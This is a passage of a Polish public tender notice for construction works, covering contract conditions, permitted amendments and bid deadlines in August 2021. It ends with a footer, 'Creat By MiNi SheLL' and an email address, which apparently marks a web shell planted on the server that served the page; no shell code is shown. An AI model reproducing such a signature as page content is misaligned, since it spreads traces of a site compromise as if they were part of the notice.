działalności<br/>związanej z przedmiotem zamówienia na sumę gwarancyjną określoną przez zamawiającego w części<br/>VI ust. 1 pkt 4 SWZe) W zakresie nie uregulowanym SWZ, zastosowanie mają przepisy<br/>rozporządzenia Ministra Rozwoju, Pracy, i Technologii z dnia 23.12.2020 r. poz. 2415 w sprawie<br/>podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać<br/>zamawiający od wykonawcy</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, art. 58 pzp W<br/>przypadkuwykonawców wspólnie ubiegających się o udzielenie zamówienia, Wykonawcy<br/>ustanawiająpełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia<br/>alboreprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>Ofertawspólna, składana przez dwóch lub więcej Wykonawców, powinna spełniać<br/>następującewymagania: a) oferta powinna być sporządzona zgodnie z SWZ, b) sposób<br/>składaniadokumentów w ofercie wspólnej: − dokumenty, dotyczące własnej firmy, takie jak<br/>np.:oświadczenie o braku podstaw do wykluczenia składa każdy z Wykonawców składających<br/>ofertęwspólną we własnym imieniu; − dokumenty wspólne takie jak np.: formularz ofertowy,<br/>formularzcenowy, dokumenty podmiotowe i przedmiotowe składa pełnomocnik Wykonawców w<br/>imieniuwszystkich Wykonawców składających ofertę wspólną; c) kopie dokumentów<br/>dotyczącychkażdego z Wykonawców składających ofertę wspólną muszą być poświadczone za<br/>zgodność zoryginałem przez osobę lub osoby upoważnione do reprezentowania tych<br/>Wykonawców <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający dopuszcza – jeżeli uzna za uzasadnione – możliwość zmiany ustaleń zawartej umowy w stosunku do treści oferty Wykonawcy, o których mowa w art. 455 ust. 1 pkt 1 ustawy Pzp, w następujących przypadkach:<br/>1) zmiany wynagrodzenia Wykonawcy, w przypadku zaistnienia jednej z następujących okoliczności:<br/>a)	poprzez zmianę świadczenia rzeczowego Wykonawcy i/lub zmianę wynagrodzenia maksymalnie o 15%, w przypadku wystąpienia w trakcie realizacji przedmiotu umowy zasadności wykonania robót zamiennych w stosunku do przewidzianych dokumentacją projektową i wykonawczą,<br/>2.	Zgodnie z art. 454 ustawy Prawo zamówień publicznych Zamawiający przewiduje zmiany zawartej umowy dotyczące:<br/>1)	terminu realizacji zamówienia w przypadku zaistnienia jednej z następujących okoliczności:<br/>a)	wstrzymania robót lub przerw w pracach powstałych z przyczyn leżących po stronie Zamawiającego,<br/>b)	działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są konsekwencją winy którejkolwiek ze stron,<br/>c)	w razie konieczności działań zmierzających do ograniczenia skutków zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć,<br/>d)	w razie zaistnienia zdarzeń niezależnych od Stron, po dacie zawarcia Umowy, o charakterze działania siły wyższej,<br/>e)	w przypadku wystąpienia robót zamiennych, dodatkowych nieobjętych zamówieniem podstawowym.<br/>f)	koniecznością wykonania dodatkowych badań lub ekspertyz, o czas niezbędny do wykonania dodatkowych badań lub ekspertyz lub do uzyskania wymaganych decyzji bądź uzgodnień związanych z uzyskanymi wynikami badań lub ekspertyz,<br/>g)	inne przyczyny zewnętrzne niezależne od Zamawiającego oraz Wykonawcy skutkujące brakiem możliwości zawarcia umowy w pierwotnym terminie związania ofertą, prowadzenia robót lub prac lub wykonywania innych czynności przewidzianych umowa, które spowodowały niezawinione i niemożliwe do uniknięcia przez Wykonawcę opóźnienie, przy czym przedłużenie terminu realizacji zamówienia nastąpi o liczbę dni odpowiadającą okresowi opóźnienia wywołanego ww. okolicznościami,<br/>h)	w przypadku konieczności wykonania robót zamiennych, w wyniku których konieczne będzie wydłużenie realizacji Przedmiotu Umowy, strony przewidują możliwość wydłużenia terminu realizacji Przedmiotu Umowy, o którym mowa w § 2 ust. 1 o okres potrzebny do wykonania robót zamiennych, po wprowadzeniu stosownych zmian do umowy, w formie aneksu do umowy podpisanego przez obie strony.<br/><br/>2)	osoby pełniącej funkcje kierownika budowy i kierowników robót w przypadku zaistnienia jednej z następujących okoliczności:<br/>a)	nie wykonywania lub nienależytego wykonywania swoich obowiązków wynikających z umowy, <br/>b)	śmierci, choroby lub innych zdarzeń losowych,<br/>c)	zmiana ta jest konieczna z jakichkolwiek innych przyczyn niezależnych od Wykonawcy<br/>3)	podwykonawców w przypadku zaistnienia jednej z następujących okoliczności:<br/>a)	zmiana podwykonawcy - musi być zaakceptowana przez Zamawiającego,<br/>b)	zmiana zakresu powierzonych prac.<br/>3.	Przesunięcie terminu wykonania przedmiotu umowy nastąpi o tyle dni, przez ile trwały przyczyny, przy czym wymagają one potwierdzenia przez przedstawiciela Zamawiającego.<br/>4.	Wykonawca składa Zamawiającemu pismo z prośbą o przesunięcie terminu wykonania przedmiotu umowy wraz z uzasadnieniem nie później niż 7 dni przed upływem terminu określonego w § 4 ust. 3.<br/>5.	Wprowadzenie zmian do zawartej umowy określonych w ust. 2 pkt 1 pkt 2 i pkt 3 wymaga sporządzenia przez Przedstawiciela Zamawiającego uzasadnienia określającego przyczyny zmiany. Uzasadnienie będzie załącznikiem do aneksu zmieniającego niniejszą umowę. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-08-31 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://zgnzoliborz.ezamawiajacy.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-08-31 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-09-30</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com